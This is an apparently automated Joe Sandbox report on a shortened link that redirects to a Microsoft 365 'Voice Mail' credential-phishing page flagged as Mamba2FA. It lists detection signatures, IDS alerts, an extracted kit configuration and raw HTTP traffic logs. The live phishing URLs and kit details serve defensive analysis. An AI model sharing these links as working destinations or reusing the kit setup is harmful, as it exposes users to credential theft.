Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://t.ly/Bv1rG

Overview

General Information

Sample URL:https://t.ly/Bv1rG
Analysis ID:1554533
Infos:

Detection

HTMLPhisher, Mamba2FA
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected HtmlPhish10
Yara detected Mamba 2FA PaaS
Phishing site detected (based on image similarity)
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid 'forgot password' link found
Invalid T&C link found
Suricata IDS alerts with low severity for network traffic
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • chrome.exe (PID: 4576 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 6304 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2052,i,14813094074098594587,18073620675259000167,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 6928 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://t.ly/Bv1rG" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
{"sv": "o365_1_voice", "rand": "WHZKWG4=", "uid": "USER06112024U11110609"}
SourceRuleDescriptionAuthorStrings
1.0.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
    1.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-12T16:26:59.833498+010020566432Possible Social Engineering Attempted192.168.2.649722159.89.194.49443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-12T16:26:58.486646+010020573331Successful Credential Theft Detected192.168.2.649719159.89.194.49443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://t.ly/Bv1rGSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social usering
      Source: 1.0.pages.csvMalware Configuration Extractor: Mamba2FA {"sv": "o365_1_voice", "rand": "WHZKWG4=", "uid": "USER06112024U11110609"}

      Phishing

      barindex
      Source: Yara matchFile source: 1.0.pages.csv, type: HTML
      Source: Yara matchFile source: 1.0.pages.csv, type: HTML
      Source: https://vip.kerjasimple.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123NMatcher: Found strong image similarity, brand: MICROSOFT
      Source: https://vip.kerjasimple.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123NHTTP Parser: Number of links: 0
      Source: https://vip.kerjasimple.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123NHTTP Parser: <input type="password" .../> found but no <form action="...
      Source: https://vip.kerjasimple.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123NHTTP Parser: Title: Voice Mail does not match URL
      Source: https://vip.kerjasimple.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123NHTTP Parser: Invalid link: Forgot password?
      Source: https://vip.kerjasimple.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123NHTTP Parser: Invalid link: Terms of use
      Source: https://vip.kerjasimple.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123NHTTP Parser: Invalid link: Privacy & cookies
      Source: https://vip.kerjasimple.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123NHTTP Parser: <input type="password" .../> found
      Source: https://vip.kerjasimple.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123NHTTP Parser: No favicon
      Source: https://vip.kerjasimple.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123NHTTP Parser: No <meta name="author".. found
      Source: https://vip.kerjasimple.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123NHTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49805 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49720 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49724 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49849 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49894 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49921 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49943 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49946 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49942 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49945 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49991 version: TLS 1.2

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2057333 - Severity 1 - ET PHISHING MAMBA Credential Phish Landing Page 2024-11-08 : 192.168.2.6:49719 -> 159.89.194.49:443
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: t.ly to https://vip.kerjasimple.com/m/?c3y9bzm2nv8xx3zvawnljnjhbmq9v0has1dhnd0mdwlkpvvtrviwnjexmjaynfuxmtexmdywoq==n0123n
      Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.6:49722 -> 159.89.194.49:443
      Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49805 version: TLS 1.0
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: global trafficHTTP traffic detected: GET /Bv1rG HTTP/1.1Host: t.lyConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123N HTTP/1.1Host: vip.kerjasimple.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
      Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /m/jsv.js HTTP/1.1Host: vip.kerjasimple.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vip.kerjasimple.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _cid=5f71965d2c5dc4b3564f21c2f63a98cd
      Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vip.kerjasimple.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://vip.kerjasimple.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.1.1/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://vip.kerjasimple.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vip.kerjasimple.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /m/jsv.js HTTP/1.1Host: vip.kerjasimple.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _cid=5f71965d2c5dc4b3564f21c2f63a98cd
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vip.kerjasimple.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /w3css/4/w3.css HTTP/1.1Host: www.w3schools.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://vip.kerjasimple.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: vip.kerjasimple.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vip.kerjasimple.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.1.1/webfonts/fa-solid-900.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vip.kerjasimple.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vip.kerjasimple.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.1.1/webfonts/fa-brands-400.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vip.kerjasimple.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vip.kerjasimple.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
